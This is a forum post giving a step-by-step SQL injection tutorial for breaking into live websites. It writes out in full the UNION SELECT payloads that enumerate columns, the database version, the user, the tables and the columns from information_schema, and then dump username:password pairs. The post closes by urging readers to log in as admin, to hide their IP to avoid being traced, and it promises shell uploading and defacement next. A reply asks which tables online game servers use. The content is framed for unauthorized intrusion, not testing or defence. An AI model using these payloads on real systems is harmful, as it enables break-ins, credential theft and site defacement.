(adsbygoogle = window.adsbygoogle || []).push({}); The defacing part will be up tomorrow

1) Find a vulnerable site .
To find a vulnerable site head over to this thread You must login or register to view this content.

2) Checking it is vulnerable .
To check it is vulnerable you will need to put a

    '

after the website address
Example

    www.site.com/news_veiw.php?ID=47'

Picture :

You must login or register to view this content.

If its vulnerable you will see something like this

    MySQL Login Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND show_status=1 AND article!=''' at line 1

3) Finding how many columns there is .
To do this you use the syntax

    order by 10--

Example

    www.site.com/news_veiw.php?ID=47 order by 10--

If the website loads normally keep going up by 5 intill you get an error

When you get the error it should say something like column 10 does not exist
this is when you know you have gone to high so when you get this keep changing the number by going down when you get no error this means it is that amount of columns

So say i got

1: no error
2: no error
3: no error
4: Error

This means it has 3 columns .

pictures :

You must login or register to view this content.

You must login or register to view this content.

You must login or register to view this content.

4) How to Find which column is vulnerable
To find the vulnerable column it is simple
The syntax

    union select 1,2--

you put how many columns there is so say you have 10 columns you have to put

    union select 1,2,3,4,5,6,7,8,9,10--

Example

    www.site.com/news_veiw?ID=-47 union select 1,2--

Note there is a

    -

before the 47 ^ .
It will come up with a number . this is the vulnerable column .

Pictures :
You must login or register to view this content.


5) Now to find the database version

To do this its a simple syntax

    @@version 

All you have to do is replace the vulnerable column with @@version

Example :

    www.site.com/news_veiw?ID=-47 union select 1,@@version--

So as you can see the vulnerable columns number was 2 .

Pictures :

You must login or register to view this content.
As you can see in the picture the data base version is 4.

If the data base version is 4 then i suggest using havij

If the data base is version 5 then you can get the tables and columns where as if you are trying to hack a version 4 data base you have to guesses the tables and columns .

6) getting the current user .

Simply replace the @@version with user() .

example :

    www.site.com/news_view?ID=-47 union select 1,user()--

Pictures :

You must login or register to view this content.

7) getting the data base
to get the data base you just need to change a couple of things

    union select 

-->

    +UNION+SELECT+

    user()

-->

    database()

and you have to take the

    -

of at the end

Example :

    www.site.com/news_view?ID=-47+UNION+SELECT+1,database()

Picture :
You must login or register to view this content.

For version 5 only .

getting the tables
quite a lot gets changed on this syntax

    database()

-->

    group_concat(table_name)

Then add

    from information_schema.tables where table_schema=database()--

at the end

example :

    www.site.com/news_view?ID=-47+UNION+SELECT+1,group_concat(table_name) from information_schema.tables where table_schema=database()--

It will come up with loads of words there should be something like admin or users

Pictures :

You must login or register to view this content.

9) Getting The columns
Syntax's =

    group_concat(table_name)

-->

    group_concat(column_name)

    from information_schema.tables where table_schema=database()--

-->

    from information_schema.columns where table_schema=database()--

Example :

    www.site.com/news_view?ID=-47+UNION+SELECT+1,group_concat(column_name) from information_schema.columns where table_schema=database()--

Pictures :

You must login or register to view this content.

Should display something like password and user name .

10) Dumping users/pass

syntax :

    group_concat(column+name)

-->

    group_concat(login,0x3a,password,0x3a)

Note that the login and password was found in the column if there was no login and password in the column this will not work and you will need to change it to the stuff you found .

    from information_schema.columns where table_schema=database()--

-->

    from the bpuser--

note that it is the table which you found earlier which you put instead of bpusers

Pictures :

You must login or register to view this content.

There will be a username then the : separates the username and pass
e,g
say the username was admin and pass is 123 then it will be displayed like this

admin:123

Once you have done this you will need to find the admin page and login

make sure you hide your ip or they can trace you


Happy Hacking :pirate:
Please dont leach took about 30 mins to write out

Some pictures were used from hf

But most were my own

[multipage=Uploading the shell]



Please note that the video is not mine !

WHOW.. Great!!
Really Thanks for this Topic!
Do you know some Tables of Online games like: WoW ,Aion?
I only know their Tables of Emulate Java Private Servers